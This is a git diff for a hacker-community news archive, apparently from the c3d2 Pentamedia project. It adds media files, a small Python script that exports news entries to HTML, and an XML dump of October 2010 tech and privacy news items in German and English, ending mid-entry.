diff --git a/data.27c3/135.jpg b/data.27c3/135.jpg new file mode 100644 index 0000000..37e0306 Binary files /dev/null and b/data.27c3/135.jpg differ diff --git a/data.27c3/167.jpg b/data.27c3/167.jpg new file mode 100644 index 0000000..4638e6c Binary files /dev/null and b/data.27c3/167.jpg differ diff --git a/data.27c3/3.jpg b/data.27c3/3.jpg new file mode 100644 index 0000000..b56c96d Binary files /dev/null and b/data.27c3/3.jpg differ diff --git a/data.27c3/307.jpg b/data.27c3/307.jpg new file mode 100644 index 0000000..56b39b8 Binary files /dev/null and b/data.27c3/307.jpg differ diff --git a/data.27c3/341.jpg b/data.27c3/341.jpg new file mode 100644 index 0000000..7617fc0 Binary files /dev/null and b/data.27c3/341.jpg differ diff --git a/data.27c3/36.flv b/data.27c3/36.flv new file mode 100644 index 0000000..71661d2 Binary files /dev/null and b/data.27c3/36.flv differ diff --git a/data.27c3/459.jpg b/data.27c3/459.jpg new file mode 100644 index 0000000..a933ab6 Binary files /dev/null and b/data.27c3/459.jpg differ diff --git a/data.27c3/BodyScannerCar.webm b/data.27c3/BodyScannerCar.webm new file mode 100644 index 0000000..9651225 Binary files /dev/null and b/data.27c3/BodyScannerCar.webm differ diff --git a/data.27c3/ballmer-200.jpg b/data.27c3/ballmer-200.jpg new file mode 100644 index 0000000..cf572c4 Binary files /dev/null and b/data.27c3/ballmer-200.jpg differ diff --git a/data.27c3/dump_data_to_html.py b/data.27c3/dump_data_to_html.py new file mode 100755 index 0000000..24f2c16 --- /dev/null +++ b/data.27c3/dump_data_to_html.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +# -*- coding: utf-8 -*- + +""" +Dump the Pentasubmitter data via Django ORM to intermediate csv format +""" + +__author__ = "Frank Becker " +__version__ = "$Revision: 0.0 $" +__date__ = "$Date: YDATE $" +__copyright__ = "Copyright (c) 2010 Frank Becker" +__license__ = "Python" + +import unicodedata +from submitter import models + +def main(): + """docstring for main""" + news_entries = models.NewsEntry.objects.all() + fh = open('/tmp/pm.html', 'w') + for ne in news_entries: + #fh.write(u'http://pentamedia.c3d2.de'+ne.get_absolute_url() + u'">'+ne.title.encode('utf-8', 'ignore')+u'\n') + title = unicodedata.normalize('NFKD', ne.title).encode('ascii', 'ignore') + print title + fh.write( + u'http://pentamedia.c3d2.de' + \ + ne.get_absolute_url().encode('utf-8') + \ + u'">'+ \ + title + \ + u'\n') + +if __name__ == '__main__': + main() + +# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8 : + diff --git a/data.27c3/pentamedia.xml b/data.27c3/pentamedia.xml new file mode 100644 index 0000000..1bd5f6f --- /dev/null +++ b/data.27c3/pentamedia.xml @@ -0,0 +1,2110 @@ + +1234561715161823Patent of the MonthpatentofthThis category collects funny trivial patents on software.Software of the monthsoftwareofThis if for good, useful, hacky, great, bla, bla software.PoliticspoliticsGeneral politics with focus on net politicsGenericgenericWhat doesn't fit somewhere else...Hack of the MonthhackofthemName a hack of all kinds that has a big hack value.AnniversaryanniversarAnniversary of something special, historically important...Facepalm of the MonthfacepalmofFacepalm of the MonthEventeventEvents that happened or will happen...VulnerabilityvulnerabilVulnerabilities having some kind of uniqueness.Data Loss of the MonthdatalossBig data losses will be honoured.datalossWikiDeletia of the MonthwikideletiaofthemonthThe most m( deletion in Wikipedia of the monthwikipediaNeed a new reason to be creeped out by Facebook?Big news this week from The Electronic Frontier Foundation: the digital rights group FOIA'd some disturbing documents for its lawsuit on the US goverment's surveillance of social networks which show that feds sometimes attempt to "friend" people applying for citizenship, or people that fit certain demographics, ostensibly to sniff out terrorist threats.<p>Big news this week from The Electronic Frontier Foundation: the digital rights group FOIA'd some disturbing documents for its lawsuit on the US goverment's surveillance of social networks which show that feds sometimes attempt to "friend" people applying for citizenship, or people that fit certain demographics, ostensibly to sniff out terrorist threats. +</p>http://www.eff.org/deeplinks/2010/10/applying-citizenship-u-s-citizenship-andpage_shots/2010/10/14/needanewreasontobecreepedoutbyfacebook.pngneedanewreasontobecreepedoutbyfacebook131012010-10-14 21:26:478bürgerrechte, digital, eff, facebook, feds, foi, online, social network, surveillance, trackingBBC News - Two million US PCs recruited to botnetsThe US leads the world in numbers of Windows PCs that are part of botnets, reveals a report. + +More than *2.2* million US PCs were found to be part of botnets, networks of hijacked home computers, in the first six months of 2010, it said. + +Compiled by Microsoft, the research revealed that Brazil had the second highest level of infections at 550,000. + +Infections were highest in South Korea where 14.6 out of every 1000 machines were found to be enrolled in botnets.<p>The US leads the world in numbers of Windows PCs that are part of botnets, reveals a report. +</p> +<p>More than <em>2.2</em> million US PCs were found to be part of botnets, networks of hijacked home computers, in the first six months of 2010, it said. +</p> +<p>Compiled by Microsoft, the research revealed that Brazil had the second highest level of infections at 550,000. +</p> +<p>Infections were highest in South Korea where 14.6 out of every 1000 machines were found to be enrolled in botnets. +</p>http://www.bbc.co.uk/news/technology-11531657page_shots/2010/10/14/bbcnews-twomillionuspcsrecruitedtobotnets.pngbbcnews-twomillionuspcsrecruitedtobotnets11012010-10-14 16:43:178botnetheise online - Bericht: Easycash verkauft Bewegungsprofile von EC-KartenkundenDer EC-Kartendienstleister Easycash nutzt die ihm anvertrauten personenbezogenen Daten von Millionen Kunden, die in Geschäften bargeldlos zahlen, offenbar zur eigenen Gewinnmaximierung. Wie der Radiosender NDR Info berichtet, bietet das Tochterunternehmen Easycash Loyalty Solutions Pakete mit Datensätzen von EC-Kartenkunden an, die bis auf "eindeutige Kontoverbindungen pro Straße" heruntergebrochen sind. Für 5000 Euro pro Tausender-Paket sollen auch "Bewegungsprofile" von Kunden sowie Informationen über die "Kundenqualität" und den "Ausschöpfungsgrad" der Kunden erhältlich sein. Insgesamt soll es mindestens zehn verschiedene Auswertungsformen geben.<p>Der EC-Kartendienstleister Easycash nutzt die ihm anvertrauten personenbezogenen Daten von Millionen Kunden, die in Geschäften bargeldlos zahlen, offenbar zur eigenen Gewinnmaximierung. Wie der Radiosender NDR Info berichtet, bietet das Tochterunternehmen Easycash Loyalty Solutions Pakete mit Datensätzen von EC-Kartenkunden an, die bis auf "eindeutige Kontoverbindungen pro Straße" heruntergebrochen sind. Für 5000 Euro pro Tausender-Paket sollen auch "Bewegungsprofile" von Kunden sowie Informationen über die "Kundenqualität" und den "Ausschöpfungsgrad" der Kunden erhältlich sein. Insgesamt soll es mindestens zehn verschiedene Auswertungsformen geben. +</p>http://www.heise.de/newsticker/meldung/Bericht-Easycash-verkauft-Bewegungsprofile-von-EC-Kartenkunden-1107760.htmlpage_shots/2010/10/14/heiseonline-berichteasycashverkauftbewegung.pngheiseonline-berichteasycashverkauftbewegung11012010-10-14 11:36:088easycashHow To: Brew beer in a coffee maker, using only materials found on a modestly sized oceanographic research vesselWho knew science had so much in common with prison? + +Southern Fried Scientist explains how you can set up your own franchise of Baby Duck Breweries, using a coffee maker, cereal flakes, Vegemite "malt", seaweed "hops", and baker's yeast.<p>Who knew science had so much in common with prison? +</p> +<p>Southern Fried Scientist explains how you can set up your own franchise of Baby Duck Breweries, using a coffee maker, cereal flakes, Vegemite "malt", seaweed "hops", and baker's yeast. +</p>http://www.southernfriedscience.com/?p=1419page_shots/2010/10/13/howtobrewbeerinacoffeemakerusingonlyma.pnghowtobrewbeerinacoffeemakerusingonlyma131012010-10-13 14:58:308beer food prision shipCanon's printer/photocopier blocks jobs based on keywords Canon's new printer/scanner/fax devices can search jobs for keywords (say, the names of sensitive clients) and stop jobs if they contain them. I'm of mixed minds about this feature. On the one hand, I can see how it would go some ways to, say, preventing unscrupulous employees from printing out confidential docs and breaching the privacy of clients. On the other hand, the record is pretty clear on what happens with keyword blocking -- it's trivial to circumvent by dedicated bad guys, and it screws up the good guys (I remember AOL blocking "Phuc" as an alternate spelling for "Fuck" and rendering its Vietnamese chat rooms all but unusable; and by all accounts, it's pretty miserable trying to research breast cancer on a censored school network). + +Ultimately, regular expressions are a poor substitute for trustworthy employees, minimal data gathering, and assiduous purging of old records. + +Update: From the comments, Sabik adds: "Or, of course, you could set it up as part of industrial espionage so that when it detects a keyword, it e-mails the PDF out of the company." That's the stuff, right there -- forgotten feature in your Canon printer is activated by a rogue employee! <p>Canon's new printer/scanner/fax devices can search jobs for keywords (say, the names of sensitive clients) and stop jobs if they contain them. I'm of mixed minds about this feature. On the one hand, I can see how it would go some ways to, say, preventing unscrupulous employees from printing out confidential docs and breaching the privacy of clients. On the other hand, the record is pretty clear on what happens with keyword blocking -- it's trivial to circumvent by dedicated bad guys, and it screws up the good guys (I remember AOL blocking "Phuc" as an alternate spelling for "Fuck" and rendering its Vietnamese chat rooms all but unusable; and by all accounts, it's pretty miserable trying to research breast cancer on a censored school network). +</p> +<p>Ultimately, regular expressions are a poor substitute for trustworthy employees, minimal data gathering, and assiduous purging of old records. +</p> +<p>Update: From the comments, Sabik adds: "Or, of course, you could set it up as part of industrial espionage so that when it detects a keyword, it e-mails the PDF out of the company." That's the stuff, right there -- forgotten feature in your Canon printer is activated by a rogue employee! +</p>http://www.itnews.com.au/News/235047,canon-blocks-copy-jobs-by-keyword.aspxpage_shots/2010/10/13/canonsprinterphotocopierblocksjobsbasedonk.pngcanonsprinterphotocopierblocksjobsbasedonk131012010-10-13 14:40:568dataloss espionage hack prevention print privacy privatssphäre regexMore on the T-Mobile G2 "rootkit" -- it's actually a "NAND Lock" (and it's still a ripoff)Ars Technica's Ryan Paul has a write-up about the "rootkit" in the new T-Mobile HTC G2 phone. Background: New America Foundation recently sounded an alarm about a countermeasure built into the new G2 handsets that T-Mobile was selling. The countermeasure watches to see if you've changed your phone's OS, and if you have, it wipes out your changes and reinstalls T-Mobile's stock firmware. New America erroneously called this a rootkit; it's technically called a "NAND Lock," and other HTC handsets have come from carriers locked like this too. + +However, fact remains that T-Mobile has chosen to lock its handsets to prevent their owners from rooting/jailbreaking them. As a 10-year T-Mobile US customer who bought two full-price HTC Android handsets from T-Mobile for the purpose of rooting them so that I could load my own software, I find this repellent. I'm not the only one -- this year, the US Copyright Office carved out a legal exemption in order to explicitly legalize opening up your mobile phone. A statement from T-Mobile calls this a "side-effect" of a corruption prevention method, but this is horsewash: if all T-Mobile cares about is stopping your phone from getting corrupted, they could give jailbreakers the keys necessary to open up their handsets. + +The good news is that the phone jailbreaking community generally gets through this stuff with relative ease, and the G2 will fall sooner rather than later. But what a misery it is that the mobile phone companies continue to spend good money to frustrate the legitimate activities of their customers. <p>Ars Technica's Ryan Paul has a write-up about the "rootkit" in the new T-Mobile HTC G2 phone. Background: New America Foundation recently sounded an alarm about a countermeasure built into the new G2 handsets that T-Mobile was selling. The countermeasure watches to see if you've changed your phone's OS, and if you have, it wipes out your changes and reinstalls T-Mobile's stock firmware. New America erroneously called this a rootkit; it's technically called a "NAND Lock," and other HTC handsets have come from carriers locked like this too. +</p> +<p>However, fact remains that T-Mobile has chosen to lock its handsets to prevent their owners from rooting/jailbreaking them. As a 10-year T-Mobile US customer who bought two full-price HTC Android handsets from T-Mobile for the purpose of rooting them so that I could load my own software, I find this repellent. I'm not the only one -- this year, the US Copyright Office carved out a legal exemption in order to explicitly legalize opening up your mobile phone. A statement from T-Mobile calls this a "side-effect" of a corruption prevention method, but this is horsewash: if all T-Mobile cares about is stopping your phone from getting corrupted, they could give jailbreakers the keys necessary to open up their handsets. +</p> +<p>The good news is that the phone jailbreaking community generally gets through this stuff with relative ease, and the G2 will fall sooner rather than later. But what a misery it is that the mobile phone companies continue to spend good money to frustrate the legitimate activities of their customers. +</p>http://arstechnica.com/open-source/news/2010/10/g2-doesnt-have-rootkit-its-just-the-same-old-nand-lock.ars?old=mobilepage_shots/2010/10/13/moreonthet-mobileg2rootkit-itsactually.pngmoreonthet-mobileg2rootkit-itsactually131012010-10-13 14:36:298android, bürgerrechte, imaginary property, rootkit, t-mobilegulli.com - news - view - Stuttgart 21: Systematische Löschung von Beweisvideos? S21-Videos verschwinden von youtube<p>S21-Videos verschwinden von youtube +</p>http://gulli.com/news/stuttgart-21-systematische-l-schung-von-beweisvideos-2010-10-13page_shots/2010/10/13/gullicom-news-view-stuttgart21systematis.pnggullicom-news-view-stuttgart21systematis11012010-10-13 10:27:508youtubegulli.com - news - view - Ende der Webcam-Affäre: Schule zahlt 600.000 US-Dollar EntschädigungFollowup zur Webcam-Spy-Kekse-Drugs Geschichte: Schadensersatz 600k USD<p>Followup zur Webcam-Spy-Kekse-Drugs Geschichte: Schadensersatz 600k USD +</p>http://gulli.com/news/ende-der-webcam-aff-re-schule-zahlt-600-000-us-dollar-entsch-digung-2010-10-12page_shots/2010/10/13/gullicom-news-view-endederwebcam-affare.pnggullicom-news-view-endederwebcam-affare11012010-10-13 10:25:568spyware webcamgulli.com - news - view - Deutsche Telekom ließ Kundenbewertungen fälschenUm mehr Geschäftigkeit im eigenen Internet-Shopping-Portal vorzutäuschen, ließ die Telekom Hunderte Kundenrezensionen fälschen. Die Textagentur „Textprovider“ wurde beauftragt, 1000 kurze Bewertungen für Produkte des Online-Kaufhauses zu erstellen. Auf diesem Wege wollte man die eigene Internetseite „aufwerten“ lassen.<p>Um mehr Geschäftigkeit im eigenen Internet-Shopping-Portal vorzutäuschen, ließ die Telekom Hunderte Kundenrezensionen fälschen. Die Textagentur „Textprovider“ wurde beauftragt, 1000 kurze Bewertungen für Produkte des Online-Kaufhauses zu erstellen. Auf diesem Wege wollte man die eigene Internetseite „aufwerten“ lassen. +</p>http://www.gulli.com/news/deutsche-telekom-liess-kundenbewertungen-f-lschen-2010-10-10page_shots/2010/10/13/gullicom-news-view-deutschetelekomlieku.pnggullicom-news-view-deutschetelekomlieku11012010-10-13 10:24:368telekomgulli.com - news - view - Zensur: Wikimedia ließ Artikel bei Telepolis löschen! (Update)Ohne genauere Begründung entfernte der Heise Verlag seinen Artikel über die geplante Auslagerung von Vereinsaufgaben in die eigens dafür gegründete gGmbH. Stunden zuvor hatte die Leitung von Wikimedia den Heise Verlag anwaltlich kontaktiert.<p>Ohne genauere Begründung entfernte der Heise Verlag seinen Artikel über die geplante Auslagerung von Vereinsaufgaben in die eigens dafür gegründete gGmbH. Stunden zuvor hatte die Leitung von Wikimedia den Heise Verlag anwaltlich kontaktiert. +</p>http://www.gulli.com/news/zensur-wikimedia-liess-artikel-bei-telepolis-l-schen-2010-10-05page_shots/2010/10/13/gullicom-news-view-zensurwikimedialiea.pnggullicom-news-view-zensurwikimedialiea11012010-10-13 10:23:468wikipediagulli.com - news - view - Microsoft: Kein Internet für infizierte RechnerMS will deren Schrott aus dem Netz ziehen. Kappen der Internetverbindung für infizierte Rechner. Yeah!<p>MS will deren Schrott aus dem Netz ziehen. Kappen der Internetverbindung für infizierte Rechner. Yeah! +</p>http://www.gulli.com/news/microsoft-kein-internet-f-r-infizierte-rechner-2010-10-06page_shots/2010/10/13/gullicom-news-view-microsoftkeininternet.pnggullicom-news-view-microsoftkeininternet11012010-10-13 10:21:228antivirus microsoftgulli.com - news - view - Angreifer löschten sämtliche Dokumente auf Cryptome (Update)Cryptome got hacked. All files deleted. Most of them recovered.<p>Cryptome got hacked. All files deleted. Most of them recovered. +</p>http://www.gulli.com/news/angreifer-l-schten-s-mtliche-dokumente-auf-cryptome-2010-10-06page_shots/2010/10/13/gullicom-news-view-angreiferloschtensamtl.pnggullicom-news-view-angreiferloschtensamtl11012010-10-13 10:19:318cryptomeFoxconn Bericht über ArbeitsbedingungenFoxconn, Hersteller von viel Rechnerzeugs (u. a. Apple) ist aufgefallen durch Selbstmorde. Wollte Löhne erhöhen. +Jetzt Untersuchungsbericht: +Die Umfrage unter den Arbeitern beim Foxconn-Konzern zeigte allerdings, dass ihre tatsächlichen Einkommen nicht angehoben worden waren, sondern nur umverteilt worden sind. Das Basisgehalt eines Arbeiters lag im Mai bei etwas 1800 RMB. Es wurde im August offiziell auf 2000 erhöht. Lohnzuschüsse und andere Prämien am Quartal- und Jahresende wurden dafür aber aufgehoben, ifeng.com zitiert hier den Bericht. Zudem sei die Arbeitsmenge nach der sogenannten “Lohnerhöhung” ebenfalls angestiegen. Die unbezahlten Überstunden unter den Arbeitern nahmen demnach zu. + +Dem Bericht zufolge bilden die Praktikanten, die kurz vor dem Abschluss an der Universität stehen, fast die Hälfte der Arbeitskräfte in der Firma. + +Das Unternehmen wurde im Bericht als "KZ des 21. Jahrhunderts" bezeichnet, die Mitarbeiter seien "eingesperrt", um dem Fertigungskonzept von "just-in-time-Produktion" zu dienen. Die Studierenden seien laut dem Bericht "entführt", um Überstunden für die Firma zu machen. <p>Foxconn, Hersteller von viel Rechnerzeugs (u. a. Apple) ist aufgefallen durch Selbstmorde. Wollte Löhne erhöhen. + Jetzt Untersuchungsbericht: + Die Umfrage unter den Arbeitern beim Foxconn-Konzern zeigte allerdings, dass ihre tatsächlichen Einkommen nicht angehoben worden waren, sondern nur umverteilt worden sind. Das Basisgehalt eines Arbeiters lag im Mai bei etwas 1800 RMB. Es wurde im August offiziell auf 2000 erhöht. Lohnzuschüsse und andere Prämien am Quartal- und Jahresende wurden dafür aber aufgehoben, ifeng.com zitiert hier den Bericht. Zudem sei die Arbeitsmenge nach der sogenannten “Lohnerhöhung” ebenfalls angestiegen. Die unbezahlten Überstunden unter den Arbeitern nahmen demnach zu. +</p> +<p>Dem Bericht zufolge bilden die Praktikanten, die kurz vor dem Abschluss an der Universität stehen, fast die Hälfte der Arbeitskräfte in der Firma. +</p> +<p>Das Unternehmen wurde im Bericht als "KZ des 21. Jahrhunderts" bezeichnet, die Mitarbeiter seien "eingesperrt", um dem Fertigungskonzept von "just-in-time-Produktion" zu dienen. Die Studierenden seien laut dem Bericht "entführt", um Überstunden für die Firma zu machen. +</p>http://german.china.org.cn/fokus/2010-10/09/content_21089281.htmpage_shots/2010/10/13/unknowntitle003.pngunknowntitle00311012010-10-13 10:14:258foxconn + Tatort Redaktion &#8211; der Lynchmob wird losgelassen » F!XMBR Tatort Internet Bashing: +* Lynchmob +* Quote +* 80% von Kindesmißbrauch in Familie +* keine Hilfe für irgend einen Beteiligten +* PornoSteffi +* Polizei ermittelt in .de Bei den Fällen haben die wohl keinen Anfangsverdacht gesehen.<p>Tatort Internet Bashing: + <em> Lynchmob +</em> Quote + <em> 80% von Kindesmißbrauch in Familie +</em> keine Hilfe für irgend einen Beteiligten + <em> PornoSteffi +</em> Polizei ermittelt in .de Bei den Fällen haben die wohl keinen Anfangsverdacht gesehen. +</p>http://www.fixmbr.de/tatort-redaktion-der-lynchmob-wird-losgelassen/page_shots/2010/10/12/tatortredaktion8211derlynchmobw.pngtatortredaktion8211derlynchmobw11012010-10-12 20:57:358child porn, rtl2Grocery terminals slurped payment card data • The RegisterBei Aldi USA haben die Point-of-Sales Kassen die Kartendaten kopiert, 2 Monate lang.<p>Bei Aldi USA haben die Point-of-Sales Kassen die Kartendaten kopiert, 2 Monate lang. +</p>http://www.theregister.co.uk/2010/10/08/aldi_payment_card_breach/page_shots/2010/10/12/groceryterminalsslurpedpaymentcarddatathe.pnggroceryterminalsslurpedpaymentcarddatathe11012010-10-12 11:23:528aldiSnuggly the Security Bear Speaks on Internet Wiretappinghttp://annalist.noblogs.org/post/2010/10/12/snuggly-der-sicherheitsbar-und-die-internet-uberwachung/page_shots/2010/10/12/snugglythesecuritybearspeaksoninternetwiret.pngsnugglythesecuritybearspeaksoninternetwiret141112010-10-12 01:48:208eff state surveillanceheise online - Microsoft und Partner stellen Smartphones mit Windows Phone 7 vorHere it is: Windows Phone 7: +Kein Multitasking, kein copy'n'paste, und er Browser basiert auf dem IE6 + +m(<p>Here it is: Windows Phone 7: + Kein Multitasking, kein copy'n'paste, und er Browser basiert auf dem IE6 +</p> +<p>m( +</p>http://www.heise.de/newsticker/meldung/Microsoft-und-Partner-stellen-Smartphones-mit-Windows-Phone-7-vor-1105636.htmlpage_shots/2010/10/11/heiseonline-microsoftundpartnerstellensmart.pngheiseonline-microsoftundpartnerstellensmart11012010-10-11 23:23:238microsoft phone7"Deleted" Facebook photos still not deleted: a followupWenn man keine Accounts löschen kann, dann auch keine Bilder. Facebook löscht keine Bilder.<p>Wenn man keine Accounts löschen kann, dann auch keine Bilder. Facebook löscht keine Bilder. +</p>http://arstechnica.com/web/news/2010/10/facebook-may-be-making-strides.arspage_shots/2010/10/11/quotdeletedquotfacebookphotosstillnotdele.pngquotdeletedquotfacebookphotosstillnotdele11012010-10-11 23:03:058facebookDepubliziertes öffentlich rechtl. Sendungsmaterialdepub.org heißt jetzt depub.info +Die .org war plötzlich weg.<p>depub.org heißt jetzt depub.info + Die .org war plötzlich weg. +</p>http://depub.info/page_shots/2010/10/11/no_page_shot.pngdepubliziertes11012010-10-11 22:59:228gezIndia to build cyber attack proof operating systemHackproove O/S from India: + +'Though it will be a real-time system with Windows software, source code and architecture will be proprietary, giving us the exclusivity of owning a system unknown to foreign elements and protect our security system,' Saraswat said after unveiling a training facility at the Centre for Artificial Intelligence and Robotics (CAIR), a defence lab in this tech hub.<p>Hackproove O/S from India: +</p> +<p>'Though it will be a real-time system with Windows software, source code and architecture will be proprietary, giving us the exclusivity of owning a system unknown to foreign elements and protect our security system,' Saraswat said after unveiling a training facility at the Centre for Artificial Intelligence and Robotics (CAIR), a defence lab in this tech hub. +</p>http://www.newdelhinews.net/story/695571page_shots/2010/10/11/indiatobuildcyberattackproofoperatingsystem.pngindiatobuildcyberattackproofoperatingsystem11012010-10-11 11:31:378hackproof, india, operating systemZoom for audio enables you to hear a single conversation in huge crowdThe AudioScope software then calculates the time it would take for sound emanating from that point to reach each microphone in the circular array, and digitally corrects each audio feed to synchronise them with that spot. "If we correct the audio arriving at three microphones then we have a signal that is three times as strong," says Kjølerbakken. Doing the same thing with 300 microphones can make a single conversation audible even in a stadium full of sports fans.<p>The AudioScope software then calculates the time it would take for sound emanating from that point to reach each microphone in the circular array, and digitally corrects each audio feed to synchronise them with that spot. "If we correct the audio arriving at three microphones then we have a signal that is three times as strong," says Kjølerbakken. Doing the same thing with 300 microphones can make a single conversation audible even in a stadium full of sports fans. +</p>http://www.newscientist.com/article/dn19541-audio-zoom-picks-out-lone-voice-in-the-crowd.htmlpage_shots/2010/10/08/zoomforaudioenablesyoutohearasingleconver.pngzoomforaudioenablesyoutohearasingleconver131012010-10-08 20:28:218audio microphone privacy privatssphäre surveillance trackingheise online - Bundestag lässt Tablets zuFinally, Tablets im Bundestag zulässig. Laptops immer noch verboten: zu sperrig, zu laut.<p>Finally, Tablets im Bundestag zulässig. Laptops immer noch verboten: zu sperrig, zu laut. +</p>http://www.heise.de/newsticker/meldung/Bundestag-laesst-Tablets-zu-1103842.htmlpage_shots/2010/10/08/heiseonline-bundestaglassttabletszu.pngheiseonline-bundestaglassttabletszu11012010-10-08 10:54:058bundestag tabletT-Mobile sneaks "rootkit" into G2 phones - reinstalls locked-down OS after jailbreaking"I thought you might be interested in a new 'feature' of the latest Android phone. Officially released tomorrow October 6, some T-mobile stores began selling the HTC G2 yesterday. Within 24 hours, users have discovered that the phone has built-in hardware that restricts what software a device owner might wish to install. Specifically, one of the microchips embedded into the G2 prevents device owners from making permanent changes to the Android operating system, re-installing the original firmware." + +... Sony rootkit anyone?<p>"I thought you might be interested in a new 'feature' of the latest Android phone. Officially released tomorrow October 6, some T-mobile stores began selling the HTC G2 yesterday. Within 24 hours, users have discovered that the phone has built-in hardware that restricts what software a device owner might wish to install. Specifically, one of the microchips embedded into the G2 prevents device owners from making permanent changes to the Android operating system, re-installing the original firmware." +</p> +<p>... Sony rootkit anyone? +</p>http://oti.newamerica.net/blogposts/2010/newest_google_android_cell_phone_contains_unexpected_feature_a_malicious_root_kit-380page_shots/2010/10/06/t-mobilesneaksrootkitintog2phones-reinsta.pngt-mobilesneaksrootkitintog2phones-reinsta131012010-10-06 12:58:028android, bürgerrechte, digital media, gadget, google, hardware, linux, open, smartphone, t-mobileAlex Halderman's totally epic hack of the DC internet voting system pilot program"Within 36 hours of the system going live, our team had found and exploited a vulnerability that gave us almost total control of the server software, including the ability to change votes and reveal voters' secret ballots. In this post, I'll describe what we did, how we did it, and what it means for Internet voting. " +"Based on this experience and other results from the public tests, the D.C. Board of Elections and Ethics has announced that they will not proceed with a live deployment of electronic ballot return at this time, though they plan to continue to develop the system. Voters will still be able to download and print ballots to return by mail, which seems a lot less risky."<p>"Within 36 hours of the system going live, our team had found and exploited a vulnerability that gave us almost total control of the server software, including the ability to change votes and reveal voters' secret ballots. In this post, I'll describe what we did, how we did it, and what it means for Internet voting. " + "Based on this experience and other results from the public tests, the D.C. Board of Elections and Ethics has announced that they will not proceed with a live deployment of electronic ballot return at this time, though they plan to continue to develop the system. Voters will still be able to download and print ballots to return by mail, which seems a lot less risky." +</p>http://www.freedom-to-tinker.com/blog/jhalderm/hacking-dc-internet-voting-pilotpage_shots/2010/10/06/alexhaldermanstotallyepichackofthedcinter.pngalexhaldermanstotallyepichackofthedcinter131012010-10-06 12:56:158bürgerrechte, democracy, evoting, freiheit, hack, voting system, wahlcomputerSky Marshals to lose their cushy first-class seats?Sky Marshals like to fly first class -- that's where the cockpit is, after all. Airlines hate it when Sky Marshals fly first: they have to give them the seat, even if it means bumping some loyal customer who's paid thousands for her ticket back to coach -- and the airlines aren't allowed to tell the bump-ee why she's not getting a warm dish of pecans and a linen napkin for her gin and tonic. <p>Sky Marshals like to fly first class -- that's where the cockpit is, after all. Airlines hate it when Sky Marshals fly first: they have to give them the seat, even if it means bumping some loyal customer who's paid thousands for her ticket back to coach -- and the airlines aren't allowed to tell the bump-ee why she's not getting a warm dish of pecans and a linen napkin for her gin and tonic. +</p>http://online.wsj.com/article_email/SB10001424052748703431604575521832473932878-lMyQjAxMTAwMDIwOTEyNDkyWj.htmlpage_shots/2010/10/05/skymarshalstolosetheircushyfirst-classseats_.pngskymarshalstolosetheircushyfirst-classseats131012010-10-05 17:46:198flugzeug polizei security theater tsaBritisches Verteidigungsministerium warnt vor Facebook PlacesDas britische Verteidigungsministerium sorgt sich um die Facebook-Mitglieder unter den militärischen und zivilen Mitarbeitern der britischen Streitkräfte, insbesondere die in Nordirland stationierten. Nachdem Facebook den Dienst Places vor wenigen Wochen auch in Großbritannien startete, warnt nun das Ministry of Defense (MoD) davor, dass Angreifer Militärangehörige genau lokalisieren könnten, denn Facebook zeigt mit Hilfe der Places-Funktion standardmäßig auch den Aufenthaltsort von Mitgliedern an.<p>Das britische Verteidigungsministerium sorgt sich um die Facebook-Mitglieder unter den militärischen und zivilen Mitarbeitern der britischen Streitkräfte, insbesondere die in Nordirland stationierten. Nachdem Facebook den Dienst Places vor wenigen Wochen auch in Großbritannien startete, warnt nun das Ministry of Defense (MoD) davor, dass Angreifer Militärangehörige genau lokalisieren könnten, denn Facebook zeigt mit Hilfe der Places-Funktion standardmäßig auch den Aufenthaltsort von Mitgliedern an. +</p>http://www.heise.de/newsticker/meldung/Britisches-Verteidigungsministerium-warnt-vor-Facebook-Places-1100540.htmlpage_shots/2010/10/02/britischesverteidigungsministeriumwarntvorface.pngbritischesverteidigungsministeriumwarntvorface131012010-10-02 15:49:298facebook military privatssphäre surveillance trackingHuman society is not more violent today than in the pastProof of things you already suspected: Human society is not more violent today than in the past. Quite the opposite, in fact. (At least, as measured by statistics based on Western European historical records.) Vaughn Bell of MindHacks turned up this fascinating story from 2003, in which sociologists and historians debate what, exactly, caused the precipitous drop off in the European murder rate that happened over the course of the 17th, 18th, and 19th centuries. Theories include "The Rise of Courtly Manners" and "The Establishment of the Modern State"<p>Proof of things you already suspected: Human society is not more violent today than in the past. Quite the opposite, in fact. (At least, as measured by statistics based on Western European historical records.) Vaughn Bell of MindHacks turned up this fascinating story from 2003, in which sociologists and historians debate what, exactly, caused the precipitous drop off in the European murder rate that happened over the course of the 17th, 18th, and 19th centuries. Theories include "The Rise of Courtly Manners" and "The Establishment of the Modern State" +</p>http://www.nytimes.com/2003/05/03/arts/did-knives-forks-cut-murders-counting-backward-historians-resurrect-crime.htmlpage_shots/2010/10/01/humansocietyisnotmoreviolenttodaythaninth.pnghumansocietyisnotmoreviolenttodaythaninth131012010-10-01 10:50:278polizeistaat terrorFootball star's cereal has phone sex number on boxTara Sand and her family, including her 9-year-old daughter, called 1-800-HELP-FTC on speakerphone. +"You do have to admit it is kind of funny. When we dialed it for the second time, I sat there and thought 'are you kidding me?' Nobody has found this yet?" said Sand. +Ochocinco helped launch the cereal on September 7. He autographed boxes for fans at the Kroger Store in Newport, Ky. +As of Thursday morning, the boxes were pulled from the shelves at Kroger grocery stores until the marketing company for the cereal can be reached and the misprint can be evaluated. <p>Tara Sand and her family, including her 9-year-old daughter, called 1-800-HELP-FTC on speakerphone. + "You do have to admit it is kind of funny. When we dialed it for the second time, I sat there and thought 'are you kidding me?' Nobody has found this yet?" said Sand. + Ochocinco helped launch the cereal on September 7. He autographed boxes for fans at the Kroger Store in Newport, Ky. + As of Thursday morning, the boxes were pulled from the shelves at Kroger grocery stores until the marketing company for the cereal can be reached and the misprint can be evaluated. +</p>http://www.wcpo.com/dpp/news/region_central_cincinnati/sex-line-misprint-on-ochocinco%27s-cerealpage_shots/2010/09/30/footballstarscerealhasphonesexnumberonbox.pngfootballstarscerealhasphonesexnumberonbox131012010-09-30 20:19:188sexSlashdot Science Story | United Nations Names Ambassador To AliensWelcome the first UN-Ambassador for aliens.<p>Welcome the first UN-Ambassador for aliens. +</p>http://science.slashdot.org/story/10/09/27/1334255/United-Nations-Names-Ambassador-To-Alienspage_shots/2010/09/29/slashdotsciencestoryunitednationsnamesamba.pngslashdotsciencestoryunitednationsnamesamba11012010-09-29 15:19:238aliensMicrosoft's DRM helps the hacker - Oops | TechEyem( MS DRM-lib potentiell mit IntegerOverflow, BufferOverflow und DoS angreifbar. Wozu braucht man nochmal DRM?<p>m( MS DRM-lib potentiell mit 